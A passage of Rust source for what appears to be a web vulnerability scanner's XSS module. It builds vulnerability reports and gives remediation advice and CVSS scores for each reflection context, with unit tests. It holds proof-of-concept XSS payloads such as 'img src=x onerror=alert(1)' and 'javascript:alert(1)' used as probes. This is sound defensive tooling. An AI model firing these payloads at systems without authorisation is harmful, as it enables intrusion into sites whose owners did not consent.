url: url.to_string(),
parameter: Some(param_name.to_string()),
payload: proof.payload.clone(),
evidence: Some(proof.evidence.clone()),
remediation: self.get_remediation_for_context(&proof.context),
cwe: "CWE-79".to_string(),
cvss: self.calculate_cvss(&proof.context),
verified: true, false_positive: false,
discovered_at: chrono::Utc::now().to_rfc3339(),
ml_confidence: None,
ml_data: None,
}
}
fn create_dom_xss_vulnerability(&self, url: &str, sink: &DomSink) -> Vulnerability {
Vulnerability {
id: uuid::Uuid::new_v4().to_string(),
vuln_type: format!("DOM XSS via {} → {}", sink.source.name(), sink.sink_type.name()),
category: "XSS".to_string(),
description: format!(
"DOM-based XSS vulnerability detected. User-controlled data from {} \
flows into {} without sanitization.\n\n\
Code snippet: {}",
sink.source.name(),
sink.sink_type.name(),
sink.js_snippet,
),
severity: sink.sink_type.severity(),
confidence: Confidence::Medium, url: url.to_string(),
parameter: None,
payload: self.generate_dom_xss_payload(&sink.source),
evidence: Some(sink.js_snippet.clone()),
remediation: format!(
"Sanitize data from {} before passing to {}.\n\n\
Recommended:\n\
- Use textContent instead of innerHTML for text\n\
- Use DOMPurify.sanitize() for HTML content\n\
- Validate and encode user input\n\
- Implement Content-Security-Policy",
sink.source.name(),
sink.sink_type.name()
),
cwe: "CWE-79".to_string(),
cvss: 6.1,
verified: false,
false_positive: false,
discovered_at: chrono::Utc::now().to_rfc3339(),
ml_confidence: None,
ml_data: None,
}
}
fn generate_dom_xss_payload(&self, source: &DomSource) -> String {
match source {
DomSource::LocationHash => "#<img src=x onerror=alert(1)>".to_string(),
DomSource::LocationSearch => "?q=<img src=x onerror=alert(1)>".to_string(),
DomSource::LocationHref | DomSource::DocumentUrl => {
"javascript:alert(1)".to_string()
}
DomSource::WindowName => "<img src=x onerror=alert(1)>".to_string(),
_ => "<img src=x onerror=alert(1)>".to_string(),
}
}
fn get_remediation_for_context(&self, context: &ReflectionContext) -> String {
match context {
ReflectionContext::HtmlBody => {
"HTML encode all user input using htmlspecialchars() or equivalent:\n\
- Encode < as <\n\
- Encode > as >\n\
- Encode & as &\n\n\
Use a templating engine with auto-escaping (React, Vue, Angular).\n\
Implement Content-Security-Policy header.".to_string()
}
ReflectionContext::HtmlAttributeDoubleQuoted | ReflectionContext::HtmlAttributeSingleQuoted => {
"HTML attribute encode all user input:\n\
- Encode \" as "\n\
- Encode ' as '\n\
- Encode < as <\n\n\
Always quote attribute values.\n\
Use a templating engine with context-aware escaping.".to_string()
}
ReflectionContext::HtmlAttributeUnquoted => {
"CRITICAL: Always quote HTML attribute values!\n\n\
Change: <input value=USER_INPUT>\n\
To: <input value=\"USER_INPUT\">\n\n\
Then apply proper HTML attribute encoding.".to_string()
}
ReflectionContext::JsStringDouble | ReflectionContext::JsStringSingle => {
"JavaScript encode user input:\n\
- Use JSON.stringify() for data\n\
- Escape \\ as \\\\\n\
- Escape quotes appropriately\n\n\
Better: Pass data via data attributes and read with dataset API.\n\
Best: Use a framework that handles JS escaping (React, Vue).".to_string()
}
ReflectionContext::JsCode | ReflectionContext::EventHandler => {
"CRITICAL: Never insert user input directly into JavaScript code!\n\n\
Instead:\n\
1. Store data in data-* attributes\n\
2. Read with element.dataset in JS\n\
3. Use textContent for display\n\n\
Implement strict Content-Security-Policy.".to_string()
}
ReflectionContext::JavaScriptUrl => {
"CRITICAL: Never allow user input in javascript: URLs!\n\n\
Validate URLs with allowlist of protocols (http:, https:).\n\
Use URL validation library.\n\
Strip javascript:, data:, vbscript: protocols.".to_string()
}
_ => {
"Apply context-appropriate encoding:\n\
- HTML context: HTML entity encode\n\
- JavaScript: JSON.stringify or JS escape\n\
- URL: encodeURIComponent\n\
- CSS: CSS escape\n\n\
Use Content-Security-Policy header.\n\
Consider using a modern framework with auto-escaping.".to_string()
}
}
}
fn calculate_cvss(&self, context: &ReflectionContext) -> f32 {
match context {
ReflectionContext::JsCode | ReflectionContext::EventHandler => 7.5,
ReflectionContext::JavaScriptUrl | ReflectionContext::ScriptSrc => 7.2,
ReflectionContext::HtmlBody
| ReflectionContext::JsStringDouble
| ReflectionContext::JsStringSingle => 6.5,
ReflectionContext::HtmlAttributeDoubleQuoted
| ReflectionContext::HtmlAttributeSingleQuoted
| ReflectionContext::HtmlAttributeUnquoted => 6.3,
ReflectionContext::JsTemplateLiteral => 6.1,
ReflectionContext::CssValue | ReflectionContext::StyleTag => 5.5,
ReflectionContext::HtmlComment => 4.0,
_ => 6.1,
}
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_reflection_context_break_chars() {
assert_eq!(ReflectionContext::HtmlBody.break_chars(), "<>");
assert_eq!(ReflectionContext::HtmlAttributeDoubleQuoted.break_chars(), "\"");
assert_eq!(ReflectionContext::JsStringDouble.break_chars(), "\"\\");
}
#[test]
fn test_escaping_prevents_xss() {
let mut escaping = EscapingBehavior::default();
assert!(!escaping.prevents_xss_in(&ReflectionContext::HtmlBody));
escaping.escapes_lt = true;
escaping.escapes_gt = true;
assert!(escaping.prevents_xss_in(&ReflectionContext::HtmlBody));
}
#[test]
fn test_dom_sink_severity() {
assert_eq!(DomSinkType::Eval.severity(), Severity::Critical);
assert_eq!(DomSinkType::InnerHtml.severity(), Severity::High);
}
#[test]
fn test_context_detection_html_body() {
let scanner = ProofXssScanner::new(Arc::new(
HttpClient::new(Default::default()).unwrap(),
));
let html = "<html><body><div>CANARY123</div></body></html>";
let contexts = scanner.find_reflection_contexts(html, "CANARY123");
assert!(!contexts.is_empty());
assert!(contexts.contains(&ReflectionContext::HtmlBody));
}
#[test]
fn test_context_detection_js_string() {
let scanner = ProofXssScanner::new(Arc::new(
HttpClient::new(Default::default()).unwrap(),
));
let html = r#"<html><script>var x = "CANARY123";</script></html>"#;
let contexts = scanner.find_reflection_contexts(html, "CANARY123");
assert!(!contexts.is_empty());
assert!(contexts.contains(&ReflectionContext::JsStringDouble));
}
#[test]
fn test_context_detection_attribute() {
let scanner = ProofXssScanner::new(Arc::new(
HttpClient::new(Default::default()).unwrap(),
));
let html = r#"<html><input value="CANARY123"></html>"#;
let contexts = scanner.find_reflection_contexts(html, "CANARY123");
assert!(!contexts.is_empty());
assert!(contexts.contains(&ReflectionContext::HtmlAttributeDoubleQuoted));
}
}